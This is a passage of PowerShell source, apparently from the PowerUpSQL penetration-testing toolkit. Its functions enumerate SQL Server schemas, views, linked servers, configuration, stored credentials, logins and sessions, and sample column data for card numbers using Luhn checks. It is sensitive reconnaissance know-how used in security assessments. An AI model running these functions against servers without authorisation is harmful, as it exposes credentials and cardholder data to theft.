$Columns = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -ColumnNameSearch $Keywords -SuppressVerbose } } # Check if columns were found if($Columns) { # List columns found $Columns| ForEach-Object -Process { $sDatabaseName = $_.DatabaseName $sSchemaName = $_.SchemaName $sTableName = $_.TableName $sColumnName = $_.ColumnName $AffectedColumn = "[$sDatabaseName].[$sSchemaName].[$sTableName].[$sColumnName]" $AffectedTable = "[$sDatabaseName].[$sSchemaName].[$sTableName]" $Query = "USE $sDatabaseName; SELECT TOP $SampleSize [$sColumnName] FROM $AffectedTable WHERE [$sColumnName] is not null" $QueryRowCount = "USE $sDatabaseName; SELECT count(CAST([$sColumnName] as VARCHAR(200))) as NumRows FROM $AffectedTable WHERE [$sColumnName] is not null" # Status user if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - Column match: $AffectedColumn" Write-Verbose -Message "$Instance : - Selecting $SampleSize rows of data sample from column $AffectedColumn." } # Get row count for column matches $RowCount = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $QueryRowCount -SuppressVerbose | Select-Object -Property NumRows -ExpandProperty NumRows # Get sample data Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query $Query -SuppressVerbose | Select-Object -ExpandProperty $sColumnName | ForEach-Object -Process { if($ValidateCC) { # Check if value is CC $Value = 0 if([uint64]::TryParse($_,[ref]$Value)) { $LuhnCheck = Test-IsLuhnValid $_ -ErrorAction SilentlyContinue } else { $LuhnCheck = 'False' } # Add record $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount, $LuhnCheck) } else { # Add record $null = $TblData.Rows.Add($ComputerName, $Instance, $sDatabaseName, $sSchemaName, $sTableName, $sColumnName, $_, $RowCount) } } } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - No columns were found that matched the search." } } # Status User if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : END SEARCH DATA BY COLUMN" } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblData } } # ---------------------------------- # Get-SQLDatabaseSchema # ---------------------------------- # Author: Scott Sutherland Function Get-SQLDatabaseSchema { <# .SYNOPSIS Returns schema information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER SchemaName Schema name to filter for. .PARAMETER NoDefaults Only show information for non default databases. .EXAMPLE PS C:\> Get-SQLDatabaseSchema -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : testdb SchemaName : db_accessadmin SchemaOwner : db_accessadmin [TRUNCATED] .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseSchema -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Schema name.')] [string]$SchemaName, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblSchemas = New-Object -TypeName System.Data.DataTable # Setup schema filter if($SchemaName) { $SchemaNameFilter = " where schema_name like '%$SchemaName%'" } else { $SchemaNameFilter = '' } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Setup NoDefault filter if($NoDefaults) { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } # Get tables for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Grabbing Schemas from the $DbName database..." } # Define Query $Query = " USE $DbName; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], CATALOG_NAME as [DatabaseName], SCHEMA_NAME as [SchemaName], SCHEMA_OWNER as [SchemaOwner] FROM [$DbName].[INFORMATION_SCHEMA].[SCHEMATA] $SchemaNameFilter ORDER BY SCHEMA_NAME" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose # Append results $TblSchemas = $TblSchemas + $TblResults } } End { # Return data $TblSchemas } } # ---------------------------------- # Get-SQLView # ---------------------------------- # Author: Scott Sutherland Function Get-SQLView { <# .SYNOPSIS Returns view information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DatabaseName Database name to filter for. .PARAMETER ViewName View name to filter for. .PARAMETER NoDefaults Only display results from non default databases. .EXAMPLE PS C:\> Get-SQLView -Instance SQLServer1\STANDARDDEV2014 -DatabaseName master ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseName : master SchemaName : dbo ViewName : spt_values ViewDefinition : create view spt_values as select name collate database_default as name, number, type collate database_default as type, low, high, status from sys.spt_values IsUpdatable : NO CheckOption : NONE .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLView -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'View name.')] [string]$ViewName, [Parameter(Mandatory = $false, HelpMessage = "Don't select tables from default databases.")] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblViews = New-Object -TypeName System.Data.DataTable # Setup View filter if($ViewName) { $ViewFilter = " where table_name like '%$ViewName%'" } else { $ViewFilter = '' } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." Write-Verbose -Message "$Instance : Grabbing views from the databases below:" } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Setup NoDefault filter if($NoDefaults) { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose } else { # Get list of databases $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose } # Get tables for each database $TblDatabases | ForEach-Object -Process { # Get database name $DbName = $_.DatabaseName if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - $DbName" } # Define Query $Query = " USE $DbName; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], TABLE_CATALOG as [DatabaseName], TABLE_SCHEMA as [SchemaName], TABLE_NAME as [ViewName], VIEW_DEFINITION as [ViewDefinition], IS_UPDATABLE as [IsUpdatable], CHECK_OPTION as [CheckOption] FROM [INFORMATION_SCHEMA].[VIEWS] $ViewFilter ORDER BY TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblViews = $TblViews + $TblResults } } End { # Return data $TblViews } } # ---------------------------------- # Get-SQLServerLink # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerLink { <# .SYNOPSIS Returns link servers from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DatabaseLinkName Database link name to filter for. .EXAMPLE PS C:\> Get-SQLServerLink -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseLinkId : 0 DatabaseLinkName : SQLServer1\STANDARDDEV2014 DatabaseLinkLocation : Local Product : SQL Server Provider : SQLNCLI Catalog : Local Login : Uses Self Credentials RemoteLoginName : is_rpc_out_enabled : True is_data_access_enabled : False modify_date : 3/13/2016 12:30:33 PM ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseLinkId : 1 DatabaseLinkName : SQLServer2\SQLEXPRESS DatabaseLinkLocation : Remote Product : SQL Server Provider : SQLNCLI Catalog : Local Login : RemoteLoginName : user123 is_rpc_out_enabled : False is_data_access_enabled : True modify_date : 5/6/2016 10:20:44 AM .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerLink -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server link name.')] [string]$DatabaseLinkName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblServerLinks = New-Object -TypeName System.Data.DataTable # Setup DatabaseLinkName filter if($DatabaseLinkName) { $VDatabaseLinkNameFilter = " WHERE a.name like '$DatabaseLinkName'" } else { $DatabaseLinkNameFilter = '' } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], a.server_id as [DatabaseLinkId], a.name AS [DatabaseLinkName], CASE a.Server_id WHEN 0 THEN 'Local' ELSE 'Remote' END AS [DatabaseLinkLocation], a.product as [Product], a.provider as [Provider], a.catalog as [Catalog], 'LocalLogin' = CASE b.uses_self_credential WHEN 1 THEN 'Uses Self Credentials' ELSE c.name END, b.remote_name AS [RemoteLoginName], a.is_rpc_out_enabled, a.is_data_access_enabled, a.modify_date FROM [Master].[sys].[Servers] a LEFT JOIN [Master].[sys].[linked_logins] b ON a.server_id = b.server_id LEFT JOIN [Master].[sys].[server_principals] c ON c.principal_id = b.local_principal_id $DatabaseLinkNameFilter" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblServerLinks = $TblServerLinks + $TblResults } End { # Return data $TblServerLinks } } # ---------------------------------- # Get-SQLServerConfiguration # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerConfiguration { <# .SYNOPSIS Returns configuration information from the server using sp_configure. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLServerConfiguration -Instance SQLServer1\STANDARDDEV2014 .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerConfiguration -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Nubmer of hosts to query at one time.')] [int]$Threads = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup data table for output $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('Name') $null = $TblResults.Columns.Add('Minimum') $null = $TblResults.Columns.Add('Maximum') $null = $TblResults.Columns.Add('config_value') $null = $TblResults.Columns.Add('run_value') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Switch to track advanced options $DisableShowAdvancedOptions = 0 # Get show advance status $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Enable show advanced options if needed if ($IsShowAdvancedEnabled -eq 1) { if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." } } else { if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Show Advanced Options is disabled." } if($IsSysadmin -eq 'Yes') { if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Your a sysadmin, trying to enabled it." } # Try to enable Show Advanced Options Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Check if configuration change worked $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value if ($IsShowAdvancedEnabled2 -eq 1) { $DisableShowAdvancedOptions = 1 if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Enabled Show Advanced Options." } } else { if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." } } } } # Run sp_confgiure Get-SQLQuery -Instance $Instance -Query 'sp_configure' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | ForEach-Object -Process { $SettingName = $_.name $SettingMin = $_.minimum $SettingMax = $_.maximum $SettingConf_value = $_.config_value $SettingRun_value = $_.run_value $null = $TblResults.Rows.Add($ComputerName, $Instance, $SettingName, $SettingMin, $SettingMax, $SettingConf_value, $SettingRun_value) } # Restore Show Advanced Options state if needed if($DisableShowAdvancedOptions -eq 1 -and $IsSysadmin -eq 'Yes') { if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Disabling Show Advanced Options" } $Configurations = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose } # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblResults } } # ---------------------------------- # Get-SQLServerCredential # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerCredential { <# .SYNOPSIS Returns credentials from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLServerCredential -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 credential_id : 65536 CredentialName : MyUser credential_identity : Domain\MyUser create_date : 5/5/2016 11:16:12 PM modify_date : 5/5/2016 11:16:12 PM target_type : target_id : [TRUNCATED] .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerCredential -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Credential name.')] [string]$CredentialName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { $TblCredentials = New-Object -TypeName System.Data.DataTable # Setup CredentialName filter if($CredentialName) { $CredentialNameFilter = " WHERE name like '$CredentialName'" } else { $CredentialNameFilter = '' } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " USE master; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], credential_id, name as [CredentialName], credential_identity, create_date, modify_date, target_type, target_id FROM [master].[sys].[credentials] $CredentialNameFilter" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append results $TblCredentials = $TblCredentials + $TblResults } End { # Return data $TblCredentials } } # ---------------------------------- # Get-SQLServerLogin # ---------------------------------- Function Get-SQLServerLogin { <# .SYNOPSIS Returns logins from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER PrincipalName Pincipal name to filter for. .EXAMPLE PS C:\> Get-SQLServerLogin -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 PrincipalId : 1 PrincipalName : sa PrincipalSid : 1 PrincipalType : SQL_LOGIN CreateDate : 4/8/2003 9:10:35 AM IsLocked : 0 .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerLogin -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Principal name to filter for.')] [string]$PrincipalName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblLogins = New-Object -TypeName System.Data.DataTable $null = $TblLogins.Columns.Add('ComputerName') $null = $TblLogins.Columns.Add('Instance') $null = $TblLogins.Columns.Add('PrincipalId') $null = $TblLogins.Columns.Add('PrincipalName') $null = $TblLogins.Columns.Add('PrincipalSid') $null = $TblLogins.Columns.Add('PrincipalType') $null = $TblLogins.Columns.Add('CreateDate') $null = $TblLogins.Columns.Add('IsLocked') # Setup CredentialName filter if($PrincipalName) { $PrincipalNameFilter = " and name like '$PrincipalName'" } else { $PrincipalNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " USE master; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance],principal_id as [PrincipalId], name as [PrincipalName], sid as [PrincipalSid], type_desc as [PrincipalType], create_date as [CreateDate], LOGINPROPERTY ( name , 'IsLocked' ) as [IsLocked] FROM [sys].[server_principals] WHERE type = 'S' or type = 'U' or type = 'C' $PrincipalNameFilter" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Update sid formatting for each record $TblResults | ForEach-Object -Process { # Format principal sid $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') if ($NewSid.length -le 10) { $Sid = [Convert]::ToInt32($NewSid,16) } else { $Sid = $NewSid } # Add results to table $null = $TblLogins.Rows.Add( [string]$_.ComputerName, [string]$_.Instance, [string]$_.PrincipalId, [string]$_.PrincipalName, $Sid, [string]$_.PrincipalType, $_.CreateDate, [string]$_.IsLocked) } } End { # Return data $TblLogins } } # ---------------------------------- # Get-SQLSession # ---------------------------------- # Author: Scott Sutherland Function Get-SQLSession { <# .SYNOPSIS Returns active sessions from target SQL Servers. Sysadmin privileges is required to view all sessions. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLSession -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 PrincipalSid : 010500000000000515000000F3864312345716CC636051C017100000 PrincipalName : Domain\MyUser OriginalPrincipalName : Domain\MyUser SessionId : 51 SessionStartTime : 06/24/2016 09:26:21 SessionLoginTime : 06/24/2016 09:26:21 SessionStatus : running .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLSession -Verbose .EXAMPLE PS C:\> (Get-SQLSession -Instance SQLServer1\STANDARDDEV2014).count 48 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'PrincipalName.')] [string]$PrincipalName, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblSessions = New-Object -TypeName System.Data.DataTable $null = $TblSessions.Columns.Add('ComputerName') $null = $TblSessions.Columns.Add('Instance') $null = $TblSessions.Columns.Add('PrincipalSid') $null = $TblSessions.Columns.Add('PrincipalName') $null = $TblSessions.Columns.Add('OriginalPrincipalName') $null = $TblSessions.Columns.Add('SessionId') $null = $TblSessions.Columns.Add('SessionStartTime') $null = $TblSessions.Columns.Add('SessionLoginTime') $null = $TblSessions.Columns.Add('SessionStatus') # Setup PrincipalName filter if($PrincipalName) { $PrincipalNameFilter = " and login_name like '$PrincipalName'" } else { $PrincipalNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges to view sessions that aren't yours. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " USE master; SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], security_id as [PrincipalSid], login_name as [PrincipalName], original_login_name as [OriginalPrincipalName], session_id as [SessionId], last_request_start_time as [SessionStartTime], login_time as [SessionLoginTime], status as [SessionStatus] FROM [sys].[dm_exec_sessions] ORDER BY status $PrincipalNameFilter" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Update sid formatting for each record $TblResults | ForEach-Object -Process { # Format principal sid $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') if ($NewSid.length -le 10) { $Sid = [Convert]::ToInt32($NewSid,16) } else { $Sid = $NewSid } # Add results to table $null = $TblSessions.Rows.Add( [string]$_.ComputerName, [string]$_.Instance, $Sid, [string]$_.PrincipalName, [string]$_.OriginalPrincipalName, 